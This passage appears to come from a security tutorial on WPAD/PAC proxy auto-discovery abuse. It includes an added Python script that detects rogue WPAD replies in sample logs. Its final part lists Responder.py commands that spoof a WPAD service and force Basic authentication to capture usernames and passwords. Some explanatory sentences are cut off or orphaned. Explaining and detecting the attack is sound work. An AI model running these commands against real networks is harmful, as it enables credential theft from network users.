PAC itself works with a protocol called Web Proxy Auto-Discovery (WPAD). WPAD removes the need for the browser or the user to have a pre-configured server to connect to. Instead, WPAD lets the computer query the local network to discover the server from which to load the PAC file.
FindProxyForURL() function in the PAC script and use the proxy settings returned from this function.
WPAD is practically asking the network: "Hey there! Would you like to send me a payload I can execute?"
You can clearly see how a bad actor can abuse this.
When a device has these protocols enabled and the local DNS server cannot resolve a name, the machine asks the whole network for the host. So any host on the network that hears the query can reply, and even a reply containing incorrect information is still treated as a legitimate response.
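The fallback just described is what makes a rogue answer for the "wpad" name hard to tell apart from a real one. As an added example (not part of the original article), the script below runs simple detection logic over a few constructed name-resolution log lines: any answer for a name starting with "wpad" that arrives over a broadcast protocol, or from a host outside a trusted set, is flagged. The log format, the protocol names (LLMNR, NBNS, DNS) and all addresses are assumptions chosen for the sample; the 192.168.1.215 responder reuses the address from the commands later on this page.

```python
import re

# Constructed sample log lines (not from the original article). Assumed format:
# "<time> <proto> <QUERY|RESPONSE> name=<name> src=<ip> [answer=<ip>]"
SAMPLE_LOG = """\
10:00:01 LLMNR QUERY name=wpad src=192.168.1.50
10:00:01 LLMNR RESPONSE name=wpad src=192.168.1.215 answer=192.168.1.215
10:00:02 NBNS QUERY name=WPAD src=192.168.1.51
10:00:02 NBNS RESPONSE name=WPAD src=192.168.1.215 answer=192.168.1.215
10:00:05 DNS RESPONSE name=wpad.corp.example src=192.168.1.10 answer=192.168.1.20
10:00:09 LLMNR QUERY name=fileserver src=192.168.1.52
"""

LINE_RE = re.compile(
    r"^(?P<time>\S+) (?P<proto>\S+) (?P<kind>QUERY|RESPONSE) "
    r"name=(?P<name>\S+) src=(?P<src>\S+)(?: answer=(?P<answer>\S+))?$"
)

# Broadcast/multicast name-resolution protocols: a real WPAD server is found
# through DNS, so an answer for "wpad" over these is suspicious by itself.
BROADCAST_PROTOS = {"LLMNR", "NBNS"}


def parse_line(line):
    """Parse one log line into a dict, or return None if it does not match."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def find_rogue_wpad(log_text, trusted_wpad_hosts):
    """Return (responder_ip, proto, answer) for every WPAD answer that either
    came over a broadcast protocol or from a host not in trusted_wpad_hosts."""
    alerts = []
    for raw in log_text.splitlines():
        ev = parse_line(raw)
        if not ev or ev["kind"] != "RESPONSE":
            continue
        if not ev["name"].lower().startswith("wpad"):
            continue
        if ev["proto"] in BROADCAST_PROTOS or ev["src"] not in trusted_wpad_hosts:
            alerts.append((ev["src"], ev["proto"], ev["answer"]))
    return alerts


if __name__ == "__main__":
    for src, proto, answer in find_rogue_wpad(SAMPLE_LOG, {"192.168.1.10"}):
        print(f"rogue WPAD answer from {src} over {proto} -> {answer}")
```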
"Automatically detect settings" in Local Area Network (LAN) Settings.
According to the flow above, if an attacker wants to make sure that the attack will be successful, he must perform the following attacks:
-A: enables analyze-only mode
./Responder.py -i <your ip address> -A
./Responder.py -I <your net interface> -A
-w: starts WPAD service
-f: fingerprints victims
-v: verbose output
-F: force auth to WPAD service
./Responder.py -i 192.168.1.215 -w -f -v -F
Force Basic authentication to try to capture a username and password:
-b: force Basic HTTP authentication
./Responder.py -i 192.168.1.215 -w -f -v -b -F
[WIP] This article is a work in progress and will be updated with a proof of concept soon.